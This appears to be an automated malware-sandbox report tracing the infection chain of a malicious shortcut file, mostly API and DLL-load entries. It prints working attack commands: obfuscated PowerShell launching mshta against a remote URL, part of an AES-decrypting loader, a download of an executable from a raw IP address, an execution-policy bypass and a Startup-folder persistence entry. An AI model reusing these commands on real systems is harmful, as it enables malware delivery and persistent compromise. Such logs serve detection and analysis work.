Source: C:\Users\Public\Guard.exeCode function: 20_2_00709399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,20_2_00709399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002E8DE9 AdjustTokenPrivileges,CloseHandle,24_2_002E8DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002E9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,24_2_002E9399
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED57B0 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,11_2_00007FF7C0ED57B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EEEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00007FF7C0EEEB34
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED83D4 CoInitialize,SHGetSpecialFolderLocation,SHGetDesktopFolder,CoCreateInstance,SHCreateShellItem,CoTaskMemFree,SHBrowseForFolderW,SHGetPathFromIDListW,CoTaskMemFree,CoTaskMemFree,CoUninitialize,11_2_00007FF7C0ED83D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E56580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00007FF7C0E56580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xru3i0gj.fdn.ps1
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: duyba.lnk.download.lnkVirustotal: Detection: 20%
Source: duyba.lnk.download.lnkReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean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uOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,5196948583256038124,6281931824865784808,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wldp.dll
